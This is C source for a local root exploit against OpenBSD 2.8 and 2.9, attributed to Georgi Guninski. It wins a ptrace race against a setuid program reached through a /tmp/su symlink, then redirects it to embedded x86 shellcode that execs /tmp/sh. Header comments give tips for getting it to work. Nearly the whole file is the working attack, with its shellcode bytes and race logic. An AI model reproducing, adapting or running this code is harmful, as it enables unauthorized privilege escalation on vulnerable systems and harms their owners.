/* Written by Georgi Guninski http://www.guninski.com 
Tested on OpenBSD 2.9 and 2.8
Works best after reboot - the +s program must not be executed before, seems
executes /tmp/sh
/tmp/su must be a link to +s program
if the +s program has been executed, create and run shell script the size of RAM
You may need to type "fg" if the program receives stop signal
you may need to run the program several times
*/

#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>
#include <machine/reg.h>

int me=0;

void endit(int x)
{
if(!me)
 {
 printf("exiting\n");
 exit(0);
 }
}

extern char **environ;
int main(int ac, char **av)
{

volatile struct reg pt;

//exec "/tmp/sh"
char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
                  "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
                  "\xb0\x3b\x50\xcd\x80\x90\x90\x90";

int j,status,sig;
volatile int done=0;
volatile static int done2=0;
int pid,pid2,i;
int num; // number of processes to fork. 20 works for me on Pentium500
int target;

char *env1;
// address of $joro where execution of shell code begins. may need to be changed
unsigned int breakat=0xdfbfddaf;
num=20;
pid=getpid();
if(!getenv("joro"))
{
setenv("joro",bsdshell,1);
if (execle(av[0],"a",NULL,environ))
 perror("exec");
}
else
 breakat=(int)getenv("joro");
printf("Written by Georgi Guninski\nShall jump to %x\n",breakat);
target=pid;
printf("Started pid1=%d target=%d\n",pid,target);
for(i=0;i<num;i++)
 {
 if (!done)
  if(! (pid2 = fork()))
  {
   signal(SIGURG,&endit);
   pid2=getpid();
   while(!done)
   {
    if (!ptrace(PT_ATTACH, target,NULL,NULL))
   {
   done=1;
   printf("\nAttached!\n");
 
   wait(&status);
   sig=WSTOPSIG(status);

  printf("sig=%d %s\n",status,sys_siglist[sig]);
  ptrace(PT_GETREGS,target,(caddr_t)&pt,NULL);
  printf("eip=%x esp=%x\n",pt.r_eip,pt.r_esp);
  
 me=1;
 done2 +=1;
 
  ptrace(PT_DETACH, target,(caddr_t)breakat,NULL);

//sleep(2);
kill(0,SIGURG);
sleep(4); 
while(42)
 kill(target,SIGCONT);
   }
  }
  }
 }
// "/tmp/su" must be symbolic link to +s program . the program must not be executed before.
execle("/tmp/su","/usr/bin/su",NULL,environ);
}